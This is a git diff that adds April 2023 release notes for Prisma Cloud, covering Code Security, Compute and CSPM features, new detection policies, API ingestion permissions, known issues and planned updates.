diff --git a/cspm/rn/_graphics/aws-hyd-region.png b/cspm/rn/_graphics/aws-hyd-region.png new file mode 100644 index 000000000..187c3fffb Binary files /dev/null and b/cspm/rn/_graphics/aws-hyd-region.png differ diff --git a/cspm/rn/_graphics/codesec-rn-23.4.1-2.png b/cspm/rn/_graphics/codesec-rn-23.4.1-2.png new file mode 100644 index 000000000..6985950a7 Binary files /dev/null and b/cspm/rn/_graphics/codesec-rn-23.4.1-2.png differ diff --git a/cspm/rn/_graphics/codesec-rn-23.4.1.png b/cspm/rn/_graphics/codesec-rn-23.4.1.png new file mode 100644 index 000000000..248c3d4b9 Binary files /dev/null and b/cspm/rn/_graphics/codesec-rn-23.4.1.png differ diff --git a/cspm/rn/_graphics/rn-cwp-42899.png b/cspm/rn/_graphics/rn-cwp-42899.png new file mode 100644 index 000000000..70267c987 Binary files /dev/null and b/cspm/rn/_graphics/rn-cwp-42899.png differ diff --git a/cspm/rn/_graphics/rn-cwp-44858.png b/cspm/rn/_graphics/rn-cwp-44858.png new file mode 100644 index 000000000..2815db60b Binary files /dev/null and b/cspm/rn/_graphics/rn-cwp-44858.png differ diff --git a/cspm/rn/book.yml b/cspm/rn/book.yml index ef1b3703d..40029f694 100644 --- a/cspm/rn/book.yml +++ b/cspm/rn/book.yml @@ -22,6 +22,8 @@ topics: topics: - name: Features Introduced in 2023 file: features-introduced-in-2023.adoc + - name: Features Introduced in April 2023 + file: features-introduced-in-april-2023.adoc - name: Features Introduced in March 2023 file: features-introduced-in-march-2023.adoc - name: Features Introduced in February 2023 @@ -139,6 +141,8 @@ topics: topics: - name: Features Introduced in 2023—Code Security file: features-introduced-in-code-security-2023.adoc + - name: Features Introduced in April 2023 + file: features-introduced-in-code-security-april-2023.adoc - name: Features Introduced in March 2023 file: features-introduced-in-code-security-march-2023.adoc - name: Features Introduced in February 2023 diff --git 
a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-2023.adoc b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-2023.adoc index 013b79e53..c432632d6 100644 --- a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-2023.adoc +++ b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-2023.adoc @@ -5,6 +5,7 @@ Stay informed on the new capabilities and policies added to Prisma Cloud Code Se The following topic provides a snapshot of new features introduced for Code Security on Prisma Cloud. +* xref:features-introduced-in-code-security-april-2023.adoc[Features Introduced in April 2023] * xref:features-introduced-in-code-security-march-2023.adoc[Features Introduced in March 2023] * xref:features-introduced-in-code-security-february-2023.adoc[Features Introduced in February 2023] * xref:features-introduced-in-code-security-january-2023.adoc[Features Introduced in January 2023] diff --git a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-april-2023.adoc b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-april-2023.adoc new file mode 100644 index 000000000..294119344 --- /dev/null +++ b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-april-2023.adoc @@ -0,0 +1,33 @@ +== Features Introduced in April 2023 + +Learn about the new Code Security capabilities on Prisma™ Cloud Enterprise Edition (SaaS) in April 2023. 
+ +The following new features or enhancements are available for Prisma Cloud Code Security. These capabilities help agile teams add security checks to their existing IaC (Infrastructure-as-Code) model and enforce security throughout the build lifecycle. + +* <> +//* <> +//* <> + + +[#new-features] +=== New Features + +[cols="50%a,50%a"] +|=== +|FEATURE +|DESCRIPTION + +|*Validate Secrets during a Secrets scan* +|When Prisma Cloud performs a https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-code-security/scan-monitor/secrets-scanning[secrets scan], it can now validate certain secrets against public APIs to see if the secret is still active. This allows you to prioritize notifications on secret exposure. +Validation is off by default, but you can enable it under "Settings > Code Security Configuration > Validate Secrets". +You can view secret validation results on *Projects > Secrets* using the *Resource Explorer*, where you can either *Suppress* a valid secret or perform a *Manual Fix*. Alternatively, you can run Checkov on your repositories to filter potentially exposed secrets. + +image::codesec-rn-23.4.1.png[scale=40] + +|*Multiple Integrations support from a single Prisma Cloud account on Terraform Cloud and Enterprise Run Task* +|Prisma Cloud now supports multiple integrations with Terraform Cloud Run Task and Terraform Enterprise Run Task organizations from a single Prisma Cloud account.
+ +image::codesec-rn-23.4.1-2.png[scale=40] +|=== + + diff --git a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-march-2023.adoc b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-march-2023.adoc index b678619f0..fd761f57e 100644 --- a/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-march-2023.adoc +++ b/cspm/rn/prisma-cloud-code-security-release-information/features-introduced-in-code-security-2023/features-introduced-in-code-security-march-2023.adoc @@ -5,6 +5,7 @@ Learn about the new Code Security capabilities on Prisma™ Cloud Enterprise Edi The following new features or enhancements are available for Prisma Cloud Code Security. These capabilities help agile teams add security checks to their existing IaC (Infrastructure-as-Code) model and enforce security throughout the build lifecycle. * <> +* <> [#new-features] @@ -36,4 +37,43 @@ Here are the kind of actions you can track. image::codesec-rn-2-23.3.1.png[scale=40] -|=== \ No newline at end of file +|=== + +[#policy-updates] +=== Policy Updates + +[cols="50%a,50%a"] +|=== +|POLICY UPDATES +|DESCRIPTION + +|*AWS EBS volume region with encryption is disabled* + +|*Changes-* The Build remediation instructions are being updated. + +*Impact-* No impact on Code Security findings. + +|*Basic Auth Credentials* + +|*Changes-* The policy name is being updated. + +*Current Policy Name-* Basic Authentication Credentials + +*Impact-* No impact on Code Security findings. + +2+|*Policy Deletions* + +|*AWS EC2 instance is not configured with VPC* + +|*Changes-* This policy is deleted because resources are configured in VPC by default. + +*Impact-* Code Security findings for this policy will no longer be surfaced in scans. 
+ +|*My SQL server enables public network access (duplication of CKV_AZURE_53)* + +|*Changes-* This policy is a duplication of an existing policy, therefore will be deleted. + +*Impact-* Code Security findings for this policy will no longer be surfaced in scans. + +|=== + diff --git a/cspm/rn/prisma-cloud-code-security-release-information/look-ahead-planned-updates-prisma-cloud-code-security.adoc b/cspm/rn/prisma-cloud-code-security-release-information/look-ahead-planned-updates-prisma-cloud-code-security.adoc index f4ed051df..4fd8c82de 100644 --- a/cspm/rn/prisma-cloud-code-security-release-information/look-ahead-planned-updates-prisma-cloud-code-security.adoc +++ b/cspm/rn/prisma-cloud-code-security-release-information/look-ahead-planned-updates-prisma-cloud-code-security.adoc @@ -1,14 +1,14 @@ == Look Ahead—Planned Updates on Prisma Cloud Code Security -Review any deprecation notices and policy changes planned in the next Prisma Cloud Code Security release. +//Review any deprecation notices and policy changes planned in the next Prisma Cloud Code Security release. Read this section to learn about what is planned in the upcoming release. The Look Ahead announcements are for an upcoming or next release and it is not a cumulative list of all announcements. NOTE: The details and functionality listed below are a preview and the actual release date is subject to change. -// * <> -* <> +* <> +//* <> // [#changes-in-existing-behavior] // === Changes in Existing Behavior @@ -23,56 +23,17 @@ NOTE: The details and functionality listed below are a preview and the actual re // | // |=== -[#new-policies] -=== New Policies and Policy Updates - -Learn about the new policies and upcoming policy changes for new and existing Prisma Cloud System policies. 
+[#changes-in-existing-behavior] +=== Changes in Existing Behavior [cols="50%a,50%a"] |=== -|POLICY UPDATES +|FEATURE |DESCRIPTION +//RLP- 97674 +|*CycloneDX XML Output Format Update* -|*AWS EBS volume region with encryption is disabled* - -|*Changes-* The Build remediation instructions are being updated. - -*Impact-* No impact on Code Security findings. - -|*Basic Auth Credentials* - -|*Changes-* The policy name is being updated. - -*Current Policy Name-* Basic Authentication Credentials - -*Impact-* No impact on Code Security findings. - -|*GitHub VCS Integration* - -|To help ensure that your GitHub organization and repository and GitLab repository configurations are using proper branch protection and build integrity guidelines, Prisma Cloud is adding Build Integrity policies in the upcoming release. These permissions are required to pull organization and repository configurations and scan them for Supply Chain policy violations. -The following additional read-only permissions are being requested: - -* administration: read-only -* actions: read-only -* repository_hooks: read-only -* organization_hooks: read-only - -*Impact-* If you opt to reject or ignore the request for the additional permissions, there will be no impact on existing scans; however, you will not be able to detect violations of the build integrity policies. - - -2+|*Policy Deletions* - -|*AWS EC2 instance is not configured with VPC* - -|*Changes-* This policy is deleted because resources are configured in VPC by default. - -*Impact-* Code Security findings for this policy will no longer be surfaced in scans. - -|*My SQL server enables public network access (duplication of CKV_AZURE_53)* - -|*Changes-* This policy is a duplication of an existing policy, therefore will be deleted. - -*Impact-* Code Security findings for this policy will no longer be surfaced in scans. 
+|In 23.4.2, the CycloneDX XML output format will be updated to match the Python library updates, in which all XML tags will be namespaced. This update helps with serialization and deserialization, but it may have some breaking impact when ingesting the SBOM documents. |=== diff --git a/cspm/rn/prisma-cloud-compute-release-information/look-ahead-planned-updates-prisma-cloud-compute.adoc b/cspm/rn/prisma-cloud-compute-release-information/look-ahead-planned-updates-prisma-cloud-compute.adoc index a27b06161..470b599ff 100644 --- a/cspm/rn/prisma-cloud-compute-release-information/look-ahead-planned-updates-prisma-cloud-compute.adoc +++ b/cspm/rn/prisma-cloud-compute-release-information/look-ahead-planned-updates-prisma-cloud-compute.adoc @@ -3,7 +3,120 @@ // Review any deprecation notices and new features planned in the next Prisma Cloud Compute release. -See xref:prisma-cloud-compute-release-information.adoc#id79d9af81-3080-471d-9cd1-afe25c775be3[Prisma Cloud Compute Release Information] for the latest features the host, container, and serverless capabilities that are available on the *Compute* tab on Prisma Cloud. Currently there are no previews or announcements for updates. +See xref:prisma-cloud-compute-release-information.adoc#id79d9af81-3080-471d-9cd1-afe25c775be3[Prisma Cloud Compute Release Information] for the latest features for the host, container, and serverless capabilities that are available on the *Compute* tab on Prisma Cloud. -//Note that the details and functionality listed below are a preview of what is planned in the next Compute update planned for January 15, 2023; the changes listed herein and the actual release date is subject to change. +//Currently there are no previews or announcements for updates. +Note that the details and functionality listed below are a preview of what is planned in the next Compute update planned for Apr xx, 2023; the changes listed herein and the actual release date are subject to change.
+ +* xref:#new-features-prisma-cloud-compute[New Features in Prisma Cloud Compute] + +[#new-features-prisma-cloud-compute] +=== New Features in Prisma Cloud Compute + +[cols="50%a,50%a"] +|=== +|Feature +|Description + +2+|*New Features in the Core Platform* + +|*New Release Numbering Format* ++++45982+++ +|Starting with this release, named 30.00.xxx, Prisma Cloud versions use a new release numbering format: `major release.minor release.build`. +The major release is a number (30, in this case), followed by the minor release sequence, which starts with 00 (first release), 01 (minor 1), 02 (minor 2), and so on. +For example, the next maintenance release will be 30.01.build, and maintenance update 2 will be 30.02.build. + +//CWP-29710 +|*Support for Host VM tags from Discovery* ++++29710+++ +|We added support for Azure and GCP VM tags in addition to the already supported AWS VM tags. + +//CWP-44680 +|*Runtime Protection Support for Photon OS 4.0 Hosts* ++++44680+++ +|Defenders protect your Photon OS 4.0 host during runtime. + +//CWP-39892 +|*Support Vulnerability Management for CentOS Stream* ++++39892+++ +|We added support for CentOS Stream for vulnerability scanning. + +|*User Management Role* ++++44842+++ +|You can define two distinct system roles to manage authentication permissions. This change gives you more granular control over these permissions. The permissions of the old Authentication system role are now split into the User Management and Authentication Configuration system roles. + +//CWP-42899 +|*Cloud Radar Improvements* ++++42899+++ +|Improved filters and performance for the Cloud Radar under *Radars > Cloud*. + +image::rn-cwp-42899.png[width=800] + +//CWP-39186 +|*Support .NET Packages (Nuget, Paket)* ++++39186+++ +|Added support for vulnerability scanning of the Nuget and Paket .NET packages.
You must use twistcli to scan your hosts for these vulnerabilities. Your images and Lambda functions can be scanned using the console or twistcli. + +//CWP-46186 +|*Support OEL 7* ++++46186+++ +|Added support for Oracle Enterprise Linux 7 on x86. + +//CWP-45663 +|*Support for RHEL 9* ++++45663+++ +|Added support for Red Hat Enterprise Linux 9 on x86 and on ARM. + +2+|*New Features in Agentless Security* + +|*Support for Encrypted Volume Agentless Scanning with AWS Hub Accounts* ++++35976+++ +| You can now use agentless scanning with your AWS hub accounts to scan encrypted volumes. + +|*Support for Bottlerocket* ++++35296+++ +| Agentless scanning is now supported on Bottlerocket containers and images. + +//CWP-44014 +|*Support for Shared VPC in GCP* ++++44014+++ +|If you are using a shared VPC in GCP as part of your hub and target account scanning, you can define a VPC in your hub account and share it with all the service accounts connected to it. +You can now enter a subnet address from the hub account that Prisma Cloud uses to run the VM for agentless scanning of the target accounts using the following convention: + +[source] +---- +projects/{host_project_name}/regions/{region_name}/subnetworks/{subnet_name} +---- + +Additionally, you must grant the following permissions to the service account you use to scan your target account. This should be the account that owns the shared VPC. + +`compute.subnetworks.use` + +`compute.subnetworks.useExternalIp` + + +2+|*New Features in Host Security* + +//CWP-39820 +|*Support for CBL-Mariner on Hosts* ++++39820+++ +|Added support for deploying Host Defenders on CBL Mariner 2.0 Linux-based OS for Azure. + +2+|*New Features in Serverless* + +2+|*New Features in Web Application and API Security (WAAS)* + +|*Customizable CAPTCHA page for WAAS Bot protection* ++++44858+++ +|You can now embed a custom reCAPTCHA page branded to fit your application and protect your website from spam and abuse.
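For the shared-VPC subnet convention shown earlier, the full path can be assembled from its parts. A small sketch; the project, region, and subnet names are hypothetical placeholders:

```shell
# Hypothetical names — substitute your own host project, region, and subnet.
HOST_PROJECT="my-host-project"
REGION="us-central1"
SUBNET="agentless-scan-subnet"

# Assemble the subnet path in the convention Prisma Cloud expects:
# projects/{host_project_name}/regions/{region_name}/subnetworks/{subnet_name}
SUBNET_PATH="projects/${HOST_PROJECT}/regions/${REGION}/subnetworks/${SUBNET}"
echo "$SUBNET_PATH"
```

The assembled value is what you would paste into the agentless scanning configuration.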
The WAAS Bot Protection is available on *Defend > WAAS > Active Bot Detection*. + +image::rn-cwp-44858.png[width=300] + +2+|*End-of-Support Notifications* + +|*End of Support for a serverless scan API endpoint* ++++46784+++ +|Ends the support for `/api/vVERSION/settings/serverless-scan`. + +|=== diff --git a/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-2023.adoc b/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-2023.adoc index 64cafa8a4..68005b782 100644 --- a/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-2023.adoc +++ b/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-2023.adoc @@ -4,6 +4,7 @@ Stay informed on the new capabilities and policies added to Prisma Cloud in 2023 The following topics provide a snapshot of new features introduced for Prisma™ Cloud in 2023. Refer to the https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin[Prisma™ Cloud Administrator’s Guide] for more information on how to use the service. +* xref:features-introduced-in-april-2023.adoc[Features Introduced in April 2023] * xref:features-introduced-in-march-2023.adoc[Features Introduced in March 2023] * xref:features-introduced-in-february-2023.adoc[Features Introduced in February 2023] * xref:features-introduced-in-january-2023.adoc[Features Introduced in January 2023] diff --git a/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-april-2023.adoc b/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-april-2023.adoc new file mode 100644 index 000000000..72c358a5d --- /dev/null +++ b/cspm/rn/prisma-cloud-release-information/features-introduced-in-2023/features-introduced-in-april-2023.adoc @@ -0,0 +1,256 @@ +== Features Introduced in April 2023 + +Learn what's new on Prisma™ Cloud in April 2023. 
+ +//* <> +* <<new-features-apr-1>> + +[#new-features-apr-1] +=== New Features Introduced in 23.4.1 + +* <<new-features1>> +* <<api-ingestions1>> +* <<new-policies1>> +* <<policy-updates1>> +* <<new-compliance-benchmarks-and-updates1>> +* <<changes-in-existing-behavior1>> +* <<rest-api-updates1>> + + +[#new-features1] +=== New Features + +[cols="50%a,50%a"] +|=== +|FEATURE +|DESCRIPTION + +|*Support for New Region on AWS* +//RLP-96026 + +|Prisma Cloud now ingests data for resources deployed in the Hyderabad cloud region on AWS. + +To review a list of supported regions, select "Inventory > Assets", and choose https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud#id091e5e1f-e6d4-42a8-b2ff-85840eb23396_id9c4f8473-140d-4e4a-94a1-523e00ebfbe4[Cloud Region] from the filter drop-down. + +image::aws-hyd-region.png[scale=30] + + +|tt:[Enhancement] *OCI Terraform File Update* +//RLP-86137 +|Prisma Cloud now supports over 100 IAM policy statements without requiring a service limit increase from OCI. With this change, you must https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud#:~:text=Update%20an%20Onboarded%20OCI%20Account[update] your existing Terraform file to enable read permissions for all the supported services necessary for an OCI tenant on Prisma Cloud. + +|=== + + +[#api-ingestions1] +=== API Ingestions + +[cols="50%a,50%a"] +|=== +|SERVICE +|API DETAILS + +|*Azure Virtual WAN* +//RLP-95728 + +|*azure-vpn-server-configurations* + +Additional permission required: + +* screen:[Microsoft.Network/vpnServerConfigurations/read] + +The Reader role includes the permission. + +|*Azure Virtual WAN* +//RLP-95723 + +|*azure-p2s-vpn-gateway* + +Additional permission required: + +* screen:[Microsoft.Network/p2sVpnGateways/read] + +
+ + +|*Google Certificate Authority Service* +//RLP-95648 + +|*gcloud-certificate-authority-certificate-template* + +Additional permissions required: + +* screen:[privateca.locations.list] +* screen:[privateca.certificateTemplates.list] +* screen:[privateca.certificateTemplates.getIamPolicy] + +The Viewer role includes the permissions. + + +|*Google Traffic Director Network Service* +//RLP-95651 + +|*gcloud-traffic-director-network-service-gateway* + +Additional permissions required: + +* screen:[networkservices.locations.list] +* screen:[networkservices.gateways.list] + +The Viewer role includes the permissions. + + +|*Google Traffic Director Network Service* +//RLP-95650 + +|*gcloud-traffic-director-network-service-mesh* + +Additional permissions required: + +* screen:[networkservices.locations.list] +* screen:[networkservices.meshes.list] +* screen:[networkservices.meshes.getIamPolicy] + +The Viewer role includes the permissions. + +|=== + + +[#new-policies1] +=== New Policies + +[cols="50%a,50%a"] +|=== +|NEW POLICIES +|DESCRIPTION + +|*AWS EC2 instance publicly exposed with critical/high exploitable vulnerabilities and malware activity* +//RLP-96222 +|Identifies AWS EC2 instances which are publicly exposed and have exploitable vulnerabilities that are connected with remote systems known for malware activities. Malware includes viruses, trojans, worms and other types of malware that affect the popular open-source operating system. The network connectivity with remote systems known for malware activity on a publicly exposed and exploitable instance indicates that the instance could be under attack or already have been compromised. + +*Policy Severity—* Critical. + +|*AWS EC2 instance publicly exposed with critical/high exploitable vulnerabilities and botnet activity* +//RLP-96219 +|Identifies AWS EC2 instances which are publicly exposed and have exploitable vulnerabilities that are connected with remote systems known for botnet activities. 
Botnets can be used to perform distributed denial-of-service (DDoS) attacks, steal data, send spam, and allow the attacker to access the device and its connection. The network connectivity with remote systems known for botnet activity on a publicly exposed and exploitable instance indicates that the instance could be under attack or already have been compromised. + +*Policy Severity—* Critical. + +|*AWS EC2 instance publicly exposed with critical/high exploitable vulnerabilities and cryptominer activity* +//RLP-96024 +|Identifies AWS EC2 instances which are publicly exposed and have exploitable vulnerabilities that are connected with remote systems known for cryptominer activities. A cryptominer hides on computers or mobile devices to surreptitiously use the machine’s resources to mine cryptocurrencies. The network connectivity with remote systems known for cryptominer activity on a publicly exposed and exploitable instance indicates that the instance could be under attack or already have been compromised. + +*Policy Severity—* Critical. + +|*AWS EC2 instance publicly exposed with critical/high exploitable vulnerabilities and backdoor activity* +//RLP-96023 +|Identifies AWS EC2 instances which are publicly exposed and have exploitable vulnerabilities that are connected with remote systems known for backdoor activities. A backdoor allows unauthorized remote access to the instances where the malware is installed while bypassing the authentication mechanisms in place. The network connectivity with remote systems known for backdoor activity on a publicly exposed and exploitable instance indicates that the instance could be under attack or already have been compromised. + +*Policy Severity—* Critical. + + +|=== + +[#policy-updates1] +=== Policy Updates + +No Policy Updates for 23.4.1.
+ +[#new-compliance-benchmarks-and-updates1] +=== New Compliance Benchmarks and Updates + +[cols="50%a,50%a"] +|=== +|COMPLIANCE BENCHMARK +|DESCRIPTION + + +|*Support for ISO/IEC 27001:2022* + +//RLP-96841 +|Prisma Cloud now supports the ISO/IEC 27001:2022 compliance standard. + +ISO/IEC 27001:2022 provides guidelines for organizational information security standards and information security management practices, including the selection, implementation, and management of controls while taking the organization's information security risk environment into account. + +With this support, you can now view this built-in standard and the related policies on Prisma Cloud’s *Compliance > Standard* page. Additionally, you can generate reports for immediate viewing or download, or you can schedule recurring reports to keep track of this compliance standard over time. + +|=== + + +[#changes-in-existing-behavior1] +=== Changes in Existing Behavior + +[cols="50%a,50%a"] +|=== +|FEATURE +|DESCRIPTION + +|*Changes to Policy Severity Level* tt:[First announced in 23.2.1] +//RLP-90803, RLP-97339 + +|Prisma Cloud updated the system default policies to help you identify critical alerts and address them effectively. The policy severity levels for some system default policies are re-aligned to use the newly introduced *Critical* and *Informational* severities. Due to this change, the policies have five levels of severity; Critical, High, Medium, Low, and Informational. You can prioritize critical alerts first and then move on to the other levels. For more information, see the updated https://docs.paloaltonetworks.com/content/dam/techdocs/en_US/pdf/prisma/prisma-cloud/prerelease/policy-severity-level-changes.csv[list of policies]. + +*Impact—* + +* Your existing open alerts associated with updated policies will have a change in their severity levels. +* If you have Alert rules set up based on the *Policy Severity* filter, there may be a decrease or increase in the number of alerts. 
+* The overall Compliance posture may change due to possible alert number changes. +* If you have alert rules configured for external integrations such as ServiceNow, this shift in the number of alerts may result in sending notifications for the Resolved or Open alerts. +* If you change a custom severity of a policy back to the default severity, the new severity update will apply. + +[NOTE] +==== +This update will not affect the severities of your custom policies or the system default policies for which you have manually changed the severities (custom severity). +Also, if you have included a policy in at least one other alert rule userinput:[(not based on severity filter)], there will be no change in the alert numbers. +==== + +If you have any questions, contact your Prisma Cloud Customer Success Representative. + +|*Update for Google Compute APIs* +//RLP-95461 + +|Prisma Cloud now provides global region support, as well as a backend update to the resource ID for *gcloud-compute-url-maps*, *gcloud-compute-target-http-proxies*, and *gcloud-compute-target-https-proxies* APIs. As a result, all resources for these APIs will be deleted and then regenerated on the management console. + +Existing alerts corresponding to these resources will be resolved as Resource_Updated, and new alerts will be generated against policy violations if any. + +*Impact*—You may notice a reduced alert count. However, once the resources for *gcloud-compute-url-maps*, *gcloud-compute-target-http-proxies*, and *gcloud-compute-target-https-proxies* resume ingesting data, the alert count will return to the original numbers. + + +|=== + + +[#rest-api-updates1] +=== REST API Updates + +[cols="37%a,63%a"] +|=== +|CHANGE +|DESCRIPTION + + +|*New APIs for Onboarding Azure Cloud Accounts* +//RLP-95078 +|The following new endpoints are now available for the Cloud Accounts API. 
+ +* Add Azure Cloud Account- https://pan.dev/prisma-cloud/api/cspm/add-azure-cloud-account/[POST /cas/v1/azure_account] +* Update Azure Cloud Account- https://pan.dev/prisma-cloud/api/cspm/update-azure-cloud-account/[PUT /cas/v1/azure_account/:account_id] +* Generate and Download the Azure Terraform Template- https://pan.dev/prisma-cloud/api/cspm/generate-template-link/[POST /cas/v1/azure_template] + + +|*New APIs for Data Security Onboarding* +//RLP-75685 +|The following new endpoints are now available for the Data Security Onboarding API. + +* Fetch Account Config By Storage UUID- https://pan.dev/prisma-cloud/api/cspm/get-account-config-by-storage-uuid/[GET /config/v3/account/storageUUID/:id] +* Fetch Account Config By PCDS Account ID- https://pan.dev/prisma-cloud/api/cspm/get-account-config-by-pcds-account-id/[GET /config/v3/account/:id] +* Update the account config for the specified PCDS Account ID- https://pan.dev/prisma-cloud/api/cspm/update-pcds-account-config/[PUT /config/v3/account/:id] +* Performs a Permissions Check for the Given PCDS Account- https://pan.dev/prisma-cloud/api/cspm/get-status-pcds-account/[GET /config/v3/account/:id/status] +* Generate an Azure Terraform Script- https://pan.dev/prisma-cloud/api/cspm/generate-network-acl-script-by-account-id/[GET /config/v3/account/:subscriptionId/acl-script] +* Generate an Azure Terraform Script- https://pan.dev/prisma-cloud/api/cspm/get-azure-terraform-script/[GET /config/v3/tenant/:tenantId/:subscriptionId/terraform-script] + + +|=== + + + + diff --git a/cspm/rn/prisma-cloud-release-information/known-issues.adoc b/cspm/rn/prisma-cloud-release-information/known-issues.adoc index 2d55564e0..d11f16d1d 100644 --- a/cspm/rn/prisma-cloud-release-information/known-issues.adoc +++ b/cspm/rn/prisma-cloud-release-information/known-issues.adoc @@ -10,6 +10,12 @@ The following table lists the known issues on Prisma Cloud for the CSPM capabili |*ISSUE ID* |*DESCRIPTION* + +|*RLP-98082* +//Raised in 23.4.1 +|PCDS 
Azure only—Prisma Cloud is unable to create event grid subscriptions on storage accounts in a few regions, and therefore cannot perform forward scans on those storage accounts. + + |*RLP-95559* //Raised in 23.3.1 diff --git a/cspm/rn/prisma-cloud-release-information/look-ahead-planned-updates-prisma-cloud.adoc b/cspm/rn/prisma-cloud-release-information/look-ahead-planned-updates-prisma-cloud.adoc index ba62e09eb..cf758cf9b 100644 --- a/cspm/rn/prisma-cloud-release-information/look-ahead-planned-updates-prisma-cloud.adoc +++ b/cspm/rn/prisma-cloud-release-information/look-ahead-planned-updates-prisma-cloud.adoc @@ -3,11 +3,12 @@ Review any deprecation notices and policy changes planned in the next Prisma Cloud release. -Read this section to learn about what is planned in the 23.4.1 release. The Look Ahead announcements are for an upcoming or next release and it is not a cumulative list of all announcements. +Read this section to learn about what is planned in the 23.4.2 release. The Look Ahead announcements are for an upcoming or next release and are not a cumulative list of all announcements. *Note that the details and functionality listed below are a preview and the actual release date is subject to change.* * <> +* <> * <> * <> * <> @@ -27,24 +28,45 @@ Read this section to learn about what is planned in the Look |Beginning with the 23.4.2 release, Prisma Cloud will provide a simplified onboarding experience to adapt to your security priorities in a streamlined manner with support for CSPM, CWPP, Data Security, and Identity Security grouped as Foundational and/or Advanced capabilities (with a few enabled by default). The updated onboarding workflow provides a Faster First Time to Value (FTTV) by allowing you to onboard your AWS, Azure, or GCP cloud accounts and select the security capabilities in fewer clicks.
-|*Changes to Policy Severity Level* -//RLP-90803,RLP-97339 +|*Critical Severity Policies Included in Auto-Enable Default Policies in Enterprise Settings* +//RLP-97518 -|Beginning with the 23.4.1 release, Prisma Cloud will make changes to our system default policies to help you identify the critical alerts and ensure that you can address them efficiently. The severity levels of the system default policies will be modified as part of the planned update. For more information, see the https://docs.paloaltonetworks.com/content/dam/techdocs/en_US/pdf/prisma/prisma-cloud/prerelease/policy-severity-level-changes.csv[list of policies] that are affected. +|Beginning with the 23.4.2 release, Prisma Cloud will include Critical severity policies in the list of policies that are enabled out-of-the-box in "Enterprise Settings > Auto-Enable Default Policies". With this change, both critical and high severity policies (current behavior), will be enabled out-of-the-box. -*Impact-* You may see: +*Impact—* -* Changes in the severity of existing alerts -* Changes in your overall compliance status due to the modified severity of alerts -* Decrease or increase in the number of alerts, based on how your alert rules are set up according to the *Policy Severity* filter -* If you have configured your alert rules to send notifications to external integrations such as ServiceNow, this shift in the number of alerts may result in sending notifications for the modified alert. +* If you had previously selected Medium severity, it will now also include Critical. +* If you had previously selected High and Medium severities, it will now also include Critical. +* If you had previously selected Critical severity, it will be retained. +* If you had not selected any severity, none will be added. 
+ +|*Rate Limit Exception for GCP APIs* +//RLP-73146 +|Beginning with the 23.4.2 release, API calls from Prisma Cloud will use quota from the onboarded GCP Projects instead of the GCP Project where the service account is created. This change will enable Prisma Cloud to ingest resource metadata across multiple projects without exceeding the GCP API rate limits. + +To ensure continuous insights into all your GCP resources, perform the following tasks: + +* Grant either a new permission userinput:[serviceusage.services.use] or add a new role *Service Usage Consumer* userinput:[(roles/serviceusage.serviceUsageConsumer)] to the service account that Prisma Cloud uses to access GCP APIs. + +* tt:[Optional] Enable the following GCP services on each target project from which Prisma Cloud gets resource metadata. + +** screen:[appengine.googleapis.com] +** screen:[recommender.googleapis.com] +** screen:[sqladmin.googleapis.com] +** screen:[apikeys.googleapis.com] +** screen:[iam.googleapis.com] +** screen:[cloudresourcemanager.googleapis.com] +** screen:[orgpolicy.googleapis.com] +** screen:[cloudasset.googleapis.com] +** screen:[accessapproval.googleapis.com] +** screen:[essentialcontacts.googleapis.com] [NOTE] ==== -The severity for a few policies has been changed to maintain uniformity. If you had seen the initial notice for this update, do review the latest csv. +If you use a Terraform template, the permissions to the GCP service account will be updated automatically. ==== -If you have any questions, contact your Prisma Cloud Customer Success Representative. +*Impact*—If the above tasks are not completed, rate limit exception errors may occur for Prisma Cloud's authorized API calls to GCP. 
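The role grant and service enablement described in the Rate Limit Exception entry above can be scripted with the gcloud CLI. A dry-run sketch that only prints the commands; the project ID and service-account email are hypothetical placeholders:

```shell
# Hypothetical identifiers — replace with your own values.
PROJECT_ID="my-target-project"
SA_EMAIL="prisma-cloud-sa@my-admin-project.iam.gserviceaccount.com"

# Grant the Service Usage Consumer role to the Prisma Cloud service account.
# (Drop the `echo` prefix to execute for real.)
echo gcloud projects add-iam-policy-binding "$PROJECT_ID" \
    --member "serviceAccount:${SA_EMAIL}" \
    --role roles/serviceusage.serviceUsageConsumer

# Enable each of the listed services on the target project.
for svc in appengine recommender sqladmin apikeys iam \
    cloudresourcemanager orgpolicy cloudasset \
    accessapproval essentialcontacts; do
  echo gcloud services enable "${svc}.googleapis.com" --project "$PROJECT_ID"
done
```

As noted above, if you onboard with the Terraform template, these grants are applied automatically and the manual commands are unnecessary.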
